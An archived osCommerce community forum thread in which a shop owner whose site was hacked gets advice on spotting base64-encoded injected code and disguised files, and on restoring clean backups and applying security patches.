Jump to content

Archived

This topic is now archived and is closed to further replies.

littleminx

Virus

Recommended Posts

Hi

Please can someone help me. I have recently had my website hacked. Its coming up in my AVG security as Trojan Horse Generic when I log-in to my Admin section. I am fairly new to using OsCommerce and my web designer is away for 2 weeks time and havent got a clue what to do, or where to start. All I know is that it is not allowing customers to log-in which is understandable and also as I have recently been updating the Web. Keeps putting pictures into the incorrect catagories and also my prices have changed on different items. Please can some one help, as I havent got a clue what to do and I have spent so much time on putting images etc in and am affraid its all being corrupted. :(

Share this post


Link to post
Share on other sites

Leanne,

 

You will need to FIRE your web designer for NOT implementing the security patches and contributions required.

 

Second, you need to review all files to remove malicious code and anomalous files. THEN, read these two threads on how to secure your website. Admin Security and Website Security

 

if you are unable to complete this process on your own, I suggest you seek experienced help to clean and secure your website.

 

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

Hi Chris

 

Thanks in your reply.

 

I know it might sound silly to you but by when you say files would that be under manager files and also with regards to maliscious files how would I know what to look out for.

 

Is there a a certain type of thing to look out for??

 

Thanks in your time...

Share this post


Link to post
Share on other sites

Leanne,

 

If by file manager, you mean from your cpanel then YES. You can open and view your files from there. Malicious code typically will be 'eval base 64' encrypted code found in the file or could also be a <script> malicous code </script> that is not encrypted. Anomalous files are files created by the hacker that are used to allow him access to your server and/or store. These are harder to identify, especially in your case where you had someone else create the site for you. But, you can usually tell the difference between 'original' oscommerce code and other code.

 

These files sometimes appear as goog1e31256432321.php or similar files that make you think they are required files for your website.

 

 

Chris


:|: Was this post helpful ? Click the LIKE THIS button :|:

 

See my Profile to learn more about add ons, templates, support plans and custom coding (click here)

Share this post


Link to post
Share on other sites

just looking under the file manager now and Im looking at the most recent modified, so that it would give me a etter understanding and there is 1 file on there .htaccess 1,948 Bytes which Im not sure whether it should be on there or not.. I dont understand these hackers, because its not as if they can get anything of my website other than mess my images etc up, its so frustrating..

Share this post


Link to post
Share on other sites

Leanne,

 

Im not an OSC expert or a coding expert, but I read the security posts every day to see whats going on, and there do seem to be an increasing amount of sites being hacked.

 

From what I have read over the past 12 months or so - merly removing the google12345 etc files will not be enough to stop the hackers getting back in, they may have hidden other code to give them a sneaky way back onto your site.

 

Unless you know what you are looking for then you may not find it - and should seek experienced help. Or you could wipe your site clean and restore a known clean backup.

 

Then, before going live again, do the security fixes discussed in this forum. Without them you will be exposed to more attacks.

 

For instance I received 96 suspicious attempts at my site today from an IP in Russia, fortunately my security systems in place managed to stop access.

 

Good Luck


Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Share this post


Link to post
Share on other sites

Leanne,

 

Im not an OSC expert or a coding expert, but I read the security posts every day to see whats going on, and there do seem to be an increasing amount of sites being hacked.

 

From what I have read over the past 12 months or so - merly removing the google12345 etc files will not be enough to stop the hackers getting back in, they may have hidden other code to give them a sneaky way back onto your site.

 

Unless you know what you are looking for then you may not find it - and should seek experienced help. Or you could wipe your site clean and restore a known clean backup.

 

Then, before going live again, do the security fixes discussed in this forum. Without them you will be exposed to more attacks.

 

For instance I received 96 suspicious attempts at my site today from an IP in Russia, fortunately my security systems in place managed to stop access.

 

Good Luck

Share this post


Link to post
Share on other sites

Hi

 

Thanks in your messagge its been a bit of a nightmare to be honest as my Web Designer is away until the 1st. So tried finding out as much as I can from the more experienced. I found about 8 of those codes hidden yesturday and have removed but like you said they could be hidden any where. Im on there looking now and have noticed that there is a Database Backup Manager Section where it gives the option to either restore or delete. Little un-sure as to what to do. Also un-sure whether it would remove any of the most items that I have added to the Web, as I have spent hours of work on there. But thanks for the advice anyway..

Share this post


Link to post
Share on other sites

Hi

 

Thanks in your messagge its been a bit of a nightmare to be honest as my Web Designer is away until the 1st. So tried finding out as much as I can from the more experienced. I found about 8 of those codes hidden yesturday and have removed but like you said they could be hidden any where. Im on there looking now and have noticed that there is a Database Backup Manager Section where it gives the option to either restore or delete. Little un-sure as to what to do. Also un-sure whether it would remove any of the most items that I have added to the Web, as I have spent hours of work on there. But thanks for the advice anyway..

Leanne, usually a hacked web site does not affect the database, and that is what that backup/restore does. It only backups and restores the database (rather poorly, at that.) What you would need is a clean back up of the files in your web site. A complete set that is not infected. It is a bit of a chore to completely erase your site and restore it from a good set of backup files, but is far easier for the inexperienced as opposed to a forensic search and cleaning of the hack.

 

Wiping the site and restoring your web site files will not affect the products you previously entered, or the orders you have taken, but it will likely remove any changes made to files along the way. Depending on when your backup was done, of course.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

Thanks, might seem silly question to you as Im learning as Im going. How do I get a clean back up of the files??

Only you can tell us that. The life span of you shop is the key. At some point in the past...

 

You downloaded OS Commerce - This is the oldest backup.

You installed OS Commerce

Did you ever make a backup?

You may have made edits or added contributions.

Did you make a backup?

Now you have been hacked - anything further would be infected....

 

 

Did you or your web developer ever make a backup? You could go all the way back to using the original downloaded package from the OS Commerce download area. That would mean that any edits you have done since original installation will be lost. On the other hand, the fact that you have been hacked makes me believe that you did not have many edits or contributions installed. You may not lose much if you reverted back to the original files, as long as you reinstall the same version.


Community Bootstrap Edition, Edge

 

Avoid the most asked question. See How to Secure My Site and How do I...?

Share this post


Link to post
Share on other sites

Hi again,

 

I dont know who your host is, but they should be able to help, as most hosts run routine backups (mine does 4 per day).

 

You know you had some of the dodgy Google1234 files in your images directory - ask them to look for a backup that does not have these - thay should then be a clean backup in my view?


Now running on a fully modded, Mobile Friendly 2.3.4 Store with the Excellent MTS installed - See my profile for the mods installed ..... So much thanks for all the help given along the way by forum members.

Share this post


Link to post
Share on other sites

Thank you all for the advice, as in the past couple of days I have learnt a lot. I have removed those files starting google1def2.php etc as there were around 9 of them but like all have stated they have bound to of creeped in somewhere else.

 

My Web Designer has a back-up so I will have to wait until they are back off vacation. Then I will put added extra security on.

 

This has all been because I used a friends laptop whom appeared to have a Trojan virus on to my horror, which I was not aware of. Also had my pay-pal account was hacked the same time by this email address (ebaybuyer@hushmail.com) so keep a look out for this email address as I think this is possibly related to hacker on my Web.

 

Where as my personal pc is full of security. Typical hey!!

 

Thanks again for taking the time to give me advice...

Share this post


Link to post
Share on other sites

hi All,

this discution is quite good...

I have only one remark or more question.

 

I discover strange 2 files into catalog which allow to upload ather file and show access data to MySQL.

So in this case is it possible to uplod something into datebase some codes that caused problems...

 

Thanks for your help

 

sorry for my English

Share this post


Link to post
Share on other sites

If you found files on your site that you didn't put there then anything is possible.

 

The database and any file on the site might be compromised.


If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Share this post


Link to post
Share on other sites

×